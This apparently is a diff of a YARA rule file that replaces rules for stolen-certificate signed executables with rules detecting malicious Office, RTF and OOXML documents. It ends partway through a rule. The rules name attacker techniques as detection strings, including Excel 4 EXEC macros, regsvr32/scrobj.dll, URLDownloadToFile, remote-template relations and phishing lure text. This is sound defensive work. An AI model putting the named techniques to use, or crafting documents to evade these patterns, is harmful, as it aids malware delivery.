-		logic_hash = "27ecc138f8d574c15095032c35ad51c00d8b98f21162d1f59f1f9ca9e5b54391"
-		score = 75
-		quality = 75
+		logic_hash = "d9a672b0eeccd93b4ae98fef45560490171f8fc16b712d1e0141fc0ef1d0e342"
+		score = 65
+		quality = 73
 		tags = "FILE"
-		thumbprint = "f1f83c96ab00dcb70c0231d946b6fbd6a01e2c94e8f9f30352bbe50e89a9a51c"
-		importance = 20
+
+	strings:
+		$vb = "\\VBE7.DLL" ascii
+		$ax1 = "_Layout" ascii
+		$ax2 = "MultiPage1_" ascii
+		$ax3 = "_MouseMove" ascii
+		$ax4 = "_MouseHover" ascii
+		$ax5 = "_MouseLeave" ascii
+		$ax6 = "_MouseEnter" ascii
+		$ax7 = "ImageCombo21_Change" ascii
+		$ax8 = "InkEdit1_GotFocus" ascii
+		$ax9 = "InkPicture1_" ascii
+		$ax10 = "SystemMonitor1_" ascii
+		$ax11 = "WebBrowser1_" ascii
+		$ax12 = "_Click" ascii
+		$kw1 = "CreateObject" ascii
+		$kw2 = "CreateTextFile" ascii
+		$kw3 = ".SpawnInstance_" ascii
+		$kw4 = "WScript.Shell" ascii
+		$kw5 = { 43 68 72 [0-2] 41 73 63 [0-2] 4d 69 64 }
+		$kw6 = { 43 68 [0-2] 72 24 28 40 24 28 22 26 48 }
+		$kw7 = { 41 63 74 69 76 65 44 6f 63 75 6d 65 6e 74 }
 
 	condition:
-		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "THRANE AGENTUR ApS" and pe.signatures [ i ] . serial == "00:ec:e6:cb:f6:7d:c4:16:35:a5:e5:d0:75:f2:86:af:23" )
+		uint16( 0 ) == 0xcfd0 and $vb and 1 of ( $ax* ) and 2 of ( $kw* )
 }
-
-rule DITEKSHEN_INDICATOR_KB_CERT_5Fb6Bae8834Edd8D3D58818Edc86D7D7 : FILE
+rule DITEKSHEN_INDICATOR_OLE_Suspicious_MITRE_T1117 : T1117 FILE
 {
 	meta:
-		description = "Detects executables signed with stolen, revoked or invalid certificates"
+		description = "Detects MITRE technique T1117 in OLE documents"
 		author = "ditekSHen"
-		id = "65f5e05c-f5cd-53ba-b4ec-7f412aa63796"
-		date = "2024-10-04"
-		modified = "2024-10-04"
+		id = "0f41b011-2b63-581f-aa10-9560f27d0a27"
+		date = "2024-09-06"
+		modified = "2024-09-06"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L2456-L2467"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_office.yar#L678-L689"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "9cec6eae024d738c68d670fb61f7667bdc156245da83e5d0ae0f2012baa5bc0a"
-		score = 75
+		logic_hash = "f0d97f4de8bde18299ee0caee680a15070a1faa99fc318d144a7b7918c8cbb1f"
+		score = 65
 		quality = 75
-		tags = "FILE"
-		thumbprint = "026868bbc22c6a37094851e0c6f372da90a8776b01f024badb03033706828088"
-		importance = 20
+		tags = "T1117, FILE"
+
+	strings:
+		$s1 = "scrobj.dll" ascii nocase
+		$s2 = "regsvr32" ascii nocase
+		$s3 = "JyZWdzdnIzMi5leGU" ascii
+		$s4 = "HNjcm9iai5kbGw" ascii
 
 	condition:
-		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Tramplink LLC" and pe.signatures [ i ] . serial == "5f:b6:ba:e8:83:4e:dd:8d:3d:58:81:8e:dc:86:d7:d7" )
+		uint16( 0 ) == 0xcfd0 and 2 of them
 }
-
-rule DITEKSHEN_INDICATOR_KB_CERT_6E0Ccbdfb4777E10Ea6221B90Dc350C2 : FILE
+rule DITEKSHEN_INDICATOR_OLE_Remotetemplate
 {
 	meta:
-		description = "Detects executables signed with stolen, revoked or invalid certificates"
+		description = "Detects XML relations where an OLE object is refrencing an external target in dropper OOXML documents"
 		author = "ditekSHen"
-		id = "c8f66f21-db29-5a5d-a74d-58c152a17bc3"
-		date = "2024-10-04"
-		modified = "2024-10-04"
+		id = "fbf40436-fc0a-5e55-89ac-5e1dd93e1833"
+		date = "2024-09-06"
+		modified = "2024-09-06"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L2469-L2480"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_office.yar#L691-L702"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "fee9662133f0a3d88ce97c27f150bcea8faf21b4c4b97f90bb2aae73ee332bb9"
+		logic_hash = "80cc5b1a8a8899f632401956055374d265c734449e56ffeee5f0ba4911050f36"
 		score = 75
 		quality = 75
-		tags = "FILE"
-		thumbprint = "367b3092fbcd132efdbebabdc7240e29e3c91366f78137a27177315d32a926b9"
-		importance = 20
+		tags = ""
+
+	strings:
+		$olerel = "relationships/oleObject" ascii
+		$target1 = "Target=\"http" ascii
+		$target2 = "Target=\"file" ascii
+		$mode = "TargetMode=\"External" ascii
 
 	condition:
-		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "TRAUMALAB INTERNATIONAL APS" and pe.signatures [ i ] . serial == "6e:0c:cb:df:b4:77:7e:10:ea:62:21:b9:0d:c3:50:c2" )
+		$olerel and $mode and 1 of ( $target* )
 }
-
-rule DITEKSHEN_INDICATOR_KB_CERT_1249Aa2Ada4967969B71Ce63Bf187C38 : FILE
+rule DITEKSHEN_INDICATOR_RTF_Malver_Objects : FILE
 {
 	meta:
-		description = "Detects executables signed with stolen, revoked or invalid certificates"
+		description = "Detects RTF documents with non-standard version and embeding one of the object mostly observed in exploit documents."
 		author = "ditekSHen"
-		id = "3af35255-7583-5463-b130-ebc8abd4803b"
-		date = "2024-10-04"
-		modified = "2024-10-04"
+		id = "2d9d80e0-473e-5aac-a576-8f0002e120e2"
+		date = "2024-09-06"
+		modified = "2024-09-06"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L2482-L2493"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_office.yar#L704-L718"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "9f8ff46a3b0f5179c2c3b89e82188183fa399c67c3f0ebc28218cf3cb4ce5c70"
+		logic_hash = "69136fb8ba180f6f86e569471bcefe8f55c61af73c66ebd6062ba7369aee9a72"
 		score = 75
 		quality = 75
 		tags = "FILE"
-		thumbprint = "c139076033e8391c85ba05508c4017736a8a7d9c1350e6b5996dd94b374f403c"
-		importance = 20
+
+	strings:
+		$obj1 = "\\objhtml" ascii
+		$obj2 = "\\objdata" ascii
+		$obj3 = "\\objupdate" ascii
+		$obj4 = "\\objemb" ascii
+		$obj5 = "\\objautlink" ascii
+		$obj6 = "\\objlink" ascii
 
 	condition:
-		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Umbrella LLC" and pe.signatures [ i ] . serial == "12:49:aa:2a:da:49:67:96:9b:71:ce:63:bf:18:7c:38" )
+		uint32( 0 ) == 0x74725c7b and ( ( not uint8( 4 ) == 0x66 or not uint8( 5 ) == 0x31 or not uint8( 6 ) == 0x5c ) and 1 of ( $obj* ) )
 }
-
-rule DITEKSHEN_INDICATOR_KB_CERT_2Dcd0699Da08915Dde6D044Cb474157C : FILE
+rule DITEKSHEN_INDICATOR_PPT_Mastermana : FILE
 {
 	meta:
-		description = "Detects executables signed with stolen, revoked or invalid certificates"
+		description = "Detects known malicious pattern (MasterMana) in PowerPoint documents."
 		author = "ditekSHen"
-		id = "0b4e1d10-d385-5ca8-b9e2-00341a4c6fd9"
-		date = "2024-10-04"
-		modified = "2024-10-04"
+		id = "8e9b8185-6211-54c6-946d-b16f2226312a"
+		date = "2024-09-06"
+		modified = "2024-09-06"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L2495-L2506"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_office.yar#L720-L740"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "096cf4bb17aa86821bd8d6c8b9fd603664beb12f54a97a87e660b560bd0fc246"
+		logic_hash = "f8169e63b22fbbd48de9a63ff228d9d9fb105e95d2ea8a37c0993493515e8b2e"
 		score = 75
-		quality = 75
+		quality = 71
 		tags = "FILE"
-		thumbprint = "13bf3156e66a57d413455973866102b0a1f6d45a1e6de050ca9dcf16ecafb4e2"
-		importance = 20
+
+	strings:
+		$a1 = "auto_close" ascii nocase
+		$a2 = "autoclose" ascii nocase
+		$a3 = "auto_open" ascii nocase
+		$a4 = "autoopen" ascii nocase
+		$vb1 = "\\VBE7.DLL" ascii
+		$vb2 = { 41 74 74 72 69 62 75 74 ?? 65 20 56 42 5f 4e 61 6d ?? 65 }
+		$clsid = "000204EF-0000-0000-C000-000000000046" wide nocase
+		$i1 = "@j.mp/" ascii wide
+		$i2 = "j.mp/" ascii wide
+		$i3 = "\\pm.j\\\\:" ascii wide
+		$i4 = ".zz.ht/" ascii wide
+		$i5 = "/pm.j@" ascii wide
+		$i6 = "\\pm.j@" ascii wide
 
 	condition:
-		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "VENTE DE TOUT" and pe.signatures [ i ] . serial == "2d:cd:06:99:da:08:91:5d:de:6d:04:4c:b4:74:15:7c" )
+		uint16( 0 ) == 0xcfd0 and 1 of ( $i* ) and $clsid and 1 of ( $a* ) and 1 of ( $vb* )
 }
-
-rule DITEKSHEN_INDICATOR_KB_CERT_008D52Fb12A2511E86Bbb0Ba75C517Eab0 : FILE
+rule DITEKSHEN_INDICATOR_XML_Webrelframe_Remotetemplate : FILE
 {
 	meta:
-		description = "Detects executables signed with stolen, revoked or invalid certificates"
+		description = "Detects XML web frame relations refrencing an external target in dropper OOXML documents"
 		author = "ditekSHen"
-		id = "04b78a1c-bb2c-5844-933b-f95a0cc8c71e"
-		date = "2024-10-04"
-		modified = "2024-10-04"
+		id = "724650db-8d58-5e73-92e7-287890babc3b"
+		date = "2024-09-06"
+		modified = "2024-09-06"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L2508-L2519"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_office.yar#L742-L752"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "23dc0500af88af0e2c8ea7ff2c5a149d24fb7fd23853c4bf5ee5921a66a34672"
+		logic_hash = "fbe209e31ddb4369de02b6e91bf65f0588089c7b838dcf80f182248790b59e20"
 		score = 75
 		quality = 75
 		tags = "FILE"
-		thumbprint = "9e918ce337aebb755e23885d928e1a67eca6823934935010e82b561b928df2f9"
-		importance = 20
+
+	strings:
+		$target1 = "/frame\" Target=\"http" ascii nocase
+		$target2 = "/frame\" Target=\"file" ascii nocase
+		$mode = "TargetMode=\"External" ascii
 
 	condition:
-		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "VThink Software Consulting Inc." and pe.signatures [ i ] . serial == "00:8d:52:fb:12:a2:51:1e:86:bb:b0:ba:75:c5:17:ea:b0" )
+		uint32( 0 ) == 0x6d783f3c and ( 1 of ( $target* ) and $mode )
 }
-
-rule DITEKSHEN_INDICATOR_KB_CERT_00B1Aea98Bf0Ce789B6C952310F14Edde0 : FILE
+rule DITEKSHEN_INDICATOR_OLE_Excel4Macros_DL1 : FILE
 {
 	meta:
-		description = "Detects executables signed with stolen, revoked or invalid certificates"
+		description = "Detects OLE Excel 4 Macros documents acting as downloaders"
 		author = "ditekSHen"
-		id = "9ab5382f-d768-553c-b52c-88d3a3824459"
-		date = "2024-10-04"
-		modified = "2024-10-04"
+		id = "4212d762-ea49-5884-b697-9313f43140d5"
+		date = "2024-09-06"
+		modified = "2024-09-06"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L2521-L2532"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_office.yar#L765-L789"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "f7e8a4a0dcd952129e24e8e9351f271d7ea98ffcb7ef9ebe65c27dcc62e6a820"
+		logic_hash = "a3248027b83b982cccf235267aa27def4f640987d41c5f11509bde3e27b82fee"
 		score = 75
-		quality = 75
+		quality = 25
 		tags = "FILE"
-		thumbprint = "28324a9746edbdb41c9579032d6eb6ab4fd3e0906f250d4858ce9c5fe5e97469"
-		importance = 20
+
+	strings:
+		$s1 = "Macros Excel 4.0" fullword ascii
+		$s2 = { 00 4d 61 63 72 6f 31 85 00 }
+		$s3 = "http" ascii
+		$s4 = "file:" ascii
+		$fa_exe = ".exe" ascii nocase
+		$fa_scr = ".scr" ascii nocase
+		$fa_dll = ".dll" ascii nocase
+		$fa_bat = ".bat" ascii nocase
+		$fa_cmd = ".cmd" ascii nocase
+		$fa_sct = ".sct" ascii nocase
+		$fa_txt = ".txt" ascii nocase
+		$fa_psw = ".ps1" ascii nocase
+		$fa_py = ".py" ascii nocase
+		$fa_js = ".js" ascii nocase
 
 	condition:
-		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Absolut LLC" and pe.signatures [ i ] . serial == "00:b1:ae:a9:8b:f0:ce:78:9b:6c:95:23:10:f1:4e:dd:e0" )
+		uint16( 0 ) == 0xcfd0 and ( 3 of ( $s* ) and 1 of ( $fa* ) )
 }
-
-rule DITEKSHEN_INDICATOR_KB_CERT_00F097E59809Ae2E771B7B9Ae5Fc3408D7 : FILE
+rule DITEKSHEN_INDICATOR_OLE_Excel4Macros_DL2 : FILE
 {
 	meta:
-		description = "Detects executables signed with stolen, revoked or invalid certificates"
+		description = "Detects OLE Excel 4 Macros documents acting as downloaders"
 		author = "ditekSHen"
-		id = "edd8674d-7d45-5f77-aa47-3fbe32176324"
-		date = "2024-10-04"
-		modified = "2024-10-04"
+		id = "ea331976-6e5d-5377-a100-0f265e97177f"
+		date = "2024-09-06"
+		modified = "2024-09-06"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L2534-L2545"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_office.yar#L791-L812"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "817876ab8e649b36cac2e7b23d58fe94963c55481fbf3deff7e60a70896af6d0"
+		logic_hash = "48ab27a2f81934f6f2f034ebcd40fc083b0d90850d12a951f03dab3a4c396ec6"
 		score = 75
 		quality = 75
 		tags = "FILE"
-		thumbprint = "22ad7df275c8b5036ea05b95ce5da768049bd2b21993549eed3a8a5ada990b1e"
-		importance = 20
+
+	strings:
+		$e1 = "Macros Excel 4.0" ascii
+		$e2 = { 00 4d 61 63 72 6f 31 85 00 }
+		$a1 = { 18 00 17 00 20 00 00 01 07 00 00 00 00 00 00 00 00 00 00 01 3a 00 }
+		$a2 = { 18 00 17 00 aa 03 00 01 07 00 00 00 00 00 00 00 00 00 00 01 3a 00 }
+		$a3 = { 18 00 21 00 20 00 00 01 12 00 00 00 00 00 00 00 00 00 01 3a ff }
+		$a4 = { 18 00 17 00 20 00 00 01 07 00 00 00 00 00 00 00 00 00 00 02 3a 00 }
+		$a5 = { 18 00 17 00 aa 03 00 01 07 00 00 00 00 00 00 00 00 00 00 02 3a 00 }
+		$a6 = "auto_open" ascii nocase
+		$a7 = "auto_close" ascii nocase
+		$x1 = "* #,##0" ascii
+		$x2 = "=EXEC(CHAR(" ascii
+		$x3 = "-w 1 stARt`-s" ascii nocase
+		$x4 = ")&CHAR(" ascii
+		$x5 = "Reverse" fullword ascii
 
 	condition:
-		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "ABEL RENOVATIONS, INC." and pe.signatures [ i ] . serial == "00:f0:97:e5:98:09:ae:2e:77:1b:7b:9a:e5:fc:34:08:d7" )
+		uint16( 0 ) == 0xcfd0 and ( 1 of ( $e* ) and 1 of ( $a* ) and ( #x1 > 3 or 2 of ( $x* ) ) )
 }
-
-rule DITEKSHEN_INDICATOR_KB_CERT_2E8023A5A0328F66656E1Fc251C82680 : FILE
+rule DITEKSHEN_INDICATOR_RTF_Embedded_Excel_Urldownloadtofile : FILE
 {
 	meta:
-		description = "Detects executables signed with stolen, revoked or invalid certificates"
+		description = "Detects RTF documents that embed Excel documents for detection evation."
 		author = "ditekSHen"
-		id = "192695ab-2f38-5a0b-98ba-5c800f6b9ec1"
-		date = "2024-10-04"
-		modified = "2024-10-04"
+		id = "39b8723c-1755-5e2f-8fb2-cca5e9eef915"
+		date = "2024-09-06"
+		modified = "2024-09-06"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L2547-L2558"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_office.yar#L814-L840"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "5f0ff46d6cb2a6fe50a4e433dfbf8f62acd92b7c92d922680894fdaee2558d31"
+		logic_hash = "9416664683c249a9dc2b3d506d9dea7067a638cc4ee5ef7138e5b33a8fcd2b96"
 		score = 75
 		quality = 75
 		tags = "FILE"
-		thumbprint = "e3eff064ad23cc4c98cdbcd78e4e5a69527cf2e4"
-		importance = 20
+
+	strings:
+		$clsid1 = "2008020000000000c000000000000046" ascii nocase
+		$obj1 = "\\objhtml" ascii
+		$obj2 = "\\objdata" ascii
+		$obj3 = "\\objupdate" ascii
+		$obj4 = "\\objemb" ascii
+		$obj5 = "\\objautlink" ascii
+		$obj6 = "\\objlink" ascii
+		$ole1 = { d0 cf 11 e0 a1 b1 1a e1 }
+		$ole2 = "d0cf11e0a1b11ae1" ascii nocase
+		$ole3 = "64306366313165306131623131616531" ascii
+		$ole4 = "640a300a630a660a310a310a650a300a610a310a620a310a310a610a650a31"
+		$ole5 = { 64 30 63 66 [0-2] 31 31 65 30 61 31 62 31 31 61 65 31 }
+		$ole6 = "D0cf11E" ascii nocase
+		$s1 = "55524c446f776e6c6f6164546f46696c6541" ascii nocase
+		$s2 = "55524c4d4f4e" ascii nocase
 
 	condition:
-		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Philippe Mantes" and pe.signatures [ i ] . serial == "2e:80:23:a5:a0:32:8f:66:65:6e:1f:c2:51:c8:26:80" )
+		uint32( 0 ) == 0x74725c7b and ( 1 of ( $clsid* ) and 1 of ( $obj* ) and 1 of ( $ole* ) and 1 of ( $s* ) )
 }
-
-rule DITEKSHEN_INDICATOR_KB_CERT_38B0Eaa7C533051A456Fb96C4Ecf91C4 : FILE
+rule DITEKSHEN_INDICATOR_OLE_Excel4Macros_DL3 : FILE
 {
 	meta:
-		description = "Detects executables signed with stolen, revoked or invalid certificates"
+		description = "Detects OLE Excel 4 Macros documents acting as downloaders"
 		author = "ditekSHen"
-		id = "1133fb37-2616-5d95-83da-554d9a5a5373"
-		date = "2024-10-04"
-		modified = "2024-10-04"
+		id = "794cac49-e917-5282-8cbd-8ecf91a2dc9e"
+		date = "2024-09-06"
+		modified = "2024-09-06"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L2560-L2571"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_office.yar#L842-L860"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "3ea8eaf1fc17075a8c1f34f9b1d8a987071d58a4b68bed70db763402a9a6de97"
+		logic_hash = "83eaf60b900119b9fcd458e9e9dda119fd71785821bf282e9385031368ff9891"
 		score = 75
 		quality = 75
 		tags = "FILE"
-		thumbprint = "8e2e69b1202210dc9d2155a0f974ab8c325d5297"
-		importance = 20
+
+	strings:
+		$a1 = { 18 00 17 00 20 00 00 01 07 00 00 00 00 00 00 00 00 00 00 01 3a 00 }
+		$a2 = { 18 00 17 00 aa 03 00 01 07 00 00 00 00 00 00 00 00 00 00 01 3a 00 }
+		$a3 = { 18 00 21 00 20 00 00 01 12 00 00 00 00 00 00 00 00 00 01 3a ff }
+		$a4 = { 18 00 17 00 20 00 00 01 07 00 00 00 00 00 00 00 00 00 00 02 3a 00 }
+		$a5 = { 18 00 17 00 aa 03 00 01 07 00 00 00 00 00 00 00 00 00 00 02 3a 00 }
+		$a6 = "auto_open" ascii nocase
+		$a7 = "auto_close" ascii nocase
+		$s1 = "* #,##0" ascii
+		$s2 = "URLMon" ascii
+		$s3 = "DownloadToFileA" ascii
+		$s4 = "DllRegisterServer" ascii
 
 	condition:
-		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Marianne Septier" and pe.signatures [ i ] . serial == "38:b0:ea:a7:c5:33:05:1a:45:6f:b9:6c:4e:cf:91:c4" )
+		uint16( 0 ) == 0xcfd0 and 1 of ( $a* ) and all of ( $s* ) and #s1 > 3
 }
-
-rule DITEKSHEN_INDICATOR_KB_CERT_738Db9460A10Bb8Bc03Dc59Feac3Be5E : FILE
+rule DITEKSHEN_INDICATOR_DOC_Phishingpatterns : FILE
 {
 	meta:
-		description = "Detects executables signed with stolen, revoked or invalid certificates"
+		description = "Detects OLE, RTF, PDF and OOXML (decompressed) documents with common phishing strings"
 		author = "ditekSHen"
-		id = "3451fe9d-067a-57ea-9df1-35d427d8c71a"
-		date = "2024-10-04"
-		modified = "2024-10-04"
+		id = "67372eb5-ed07-5062-a12e-9ad8c7070f0f"
+		date = "2024-09-06"
+		modified = "2024-09-06"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L2573-L2584"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_office.yar#L862-L883"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "6a7060f2a5867e9974cb01de516ef34fb367ef9acf88e2f63c97dd05b1676504"
+		logic_hash = "50b6566cb18512f887c07576391eb492101f7534da3460d5f7740ee6f4cf707d"
 		score = 75
 		quality = 75
 		tags = "FILE"
-		thumbprint = "4cf77e598b603c13cdcd1a676ca61513558df746"
-		importance = 20
+
+	strings:
+		$s1 = "PERFORM THE FOLLOWING STEPS TO PERFORM DECRYPTION" ascii nocase
+		$s2 = "Enable Editing" ascii nocase
+		$s3 = "Enable Content" ascii nocase
+		$s4 = "WHY I CANNOT OPEN THIS DOCUMENT?" ascii nocase
+		$s5 = "You are using iOS or Android, please use Desktop PC" ascii nocase
+		$s6 = "You are trying to view this document using Online Viewer" ascii nocase
+		$s7 = "This document was edited in a different version of" ascii nocase
+		$s8 = "document are locked and will not" ascii nocase
+		$s9 = "until the \"Enable\" button is pressed" ascii nocase
+		$s10 = "This document created in online version of Microsoft Office" ascii nocase
+		$s11 = "This document created in previous version of Microsoft Office" ascii nocase
+		$s12 = "This document protected by Microsoft Office" ascii nocase
+		$s13 = "This document encrypted by" ascii nocase
+		$s14 = "document created in earlier version of microsoft office" ascii nocase
 
 	condition:
-		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Jocelyn Bennett" and pe.signatures [ i ] . serial == "73:8d:b9:46:0a:10:bb:8b:c0:3d:c5:9f:ea:c3:be:5e" )
+		( uint16( 0 ) == 0xcfd0 or uint32( 0 ) == 0x74725c7b or uint32( 0 ) == 0x46445025 or uint32( 0 ) == 0x6d783f3c ) and 2 of them
 }
-
-rule DITEKSHEN_INDICATOR_KB_CERT_141D6Dafed065980D97520E666493396 : FILE
+rule DITEKSHEN_INDICATOR_OOXML_Excel4Macros_EXEC : FILE
 {
 	meta:
-		description = "Detects executables signed with stolen, revoked or invalid certificates"
+		description = "Detects OOXML (decompressed) documents with Excel 4 Macros XLM macrosheet"
 		author = "ditekSHen"
-		id = "1a2e44d7-b801-5c3e-bf74-616f211c6d93"
-		date = "2024-10-04"
-		modified = "2024-10-04"
+		id = "674ef310-d3bc-5e15-862f-29aa111becb3"
+		date = "2024-09-06"
+		modified = "2024-09-06"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L2586-L2597"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_office.yar#L885-L898"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "37ed05b7a472ec6cbc1bba453f3be9ca1bd590ed6470d6607873ef52b28e3ea5"
+		logic_hash = "ab3994e4082390f65d030db0b898a20df1d7e4b0ca2fdedc7a9d0f1480fd0334"
 		score = 75
 		quality = 75
 		tags = "FILE"
-		thumbprint = "28225705d615a47de0d1b0e324b5b9ca7c11ce48"
-		importance = 20
+		clamav_sig = "INDICATOR.OOXML.Excel4MacrosEXEC"
+
+	strings:
+		$ms = "<xm:macrosheet" ascii nocase
+		$s1 = ">FORMULA.FILL(" ascii nocase
+		$s2 = ">REGISTER(" ascii nocase
+		$s3 = ">EXEC(" ascii nocase
+		$s4 = ">RUN(" ascii nocase
 
 	condition:
-		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Ralph Schmidt" and pe.signatures [ i ] . serial == "14:1d:6d:af:ed:06:59:80:d9:75:20:e6:66:49:33:96" )
+		uint32( 0 ) == 0x6d783f3c and $ms and ( 2 of ( $s* ) or ( $s3 ) )
 }
-
-rule DITEKSHEN_INDICATOR_KB_CERT_07Cf63Bdccc15C55E5Ce785Bdfbeaacf : FILE
+rule DITEKSHEN_INDICATOR_OOXML_Excel4Macros_Autoopenhidden : FILE
 {
 	meta:
-		description = "Detects executables signed with stolen, revoked or invalid certificates"
+		description = "Detects OOXML (decompressed) documents with Excel 4 Macros XLM macrosheet auto_open and state hidden"
 		author = "ditekSHen"
-		id = "7bdc16ed-ff95-5e96-bfe9-ad326c77c82a"
-		date = "2024-10-04"
-		modified = "2024-10-04"
+		id = "c5aab620-5254-5fc6-b236-4fe0f69cbd8e"
+		date = "2024-09-06"
+		modified = "2024-09-06"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L2599-L2610"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_office.yar#L900-L910"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "1fdd8f6535bf5a78fcd7e33475a650914053f1391fe04f885e9e5a84452bfe5a"
+		logic_hash = "a93d8aa7ac025a0c2e8a9ac833f6d4c3cd3769ffca3f87455f43411d0021e828"
 		score = 75
 		quality = 75
 		tags = "FILE"
-		thumbprint = "3306df7607bed04187d23c1eb93adf2998e51d01"
-		importance = 20
+		clamav_sig = "INDICATOR.OOXML.Excel4MacrosEXEC"
+
+	strings:
+		$s1 = "state=\"veryhidden\"" ascii nocase
+		$s2 = "<definedName name=\"_xlnm.Auto_Open" ascii nocase
 
 	condition:
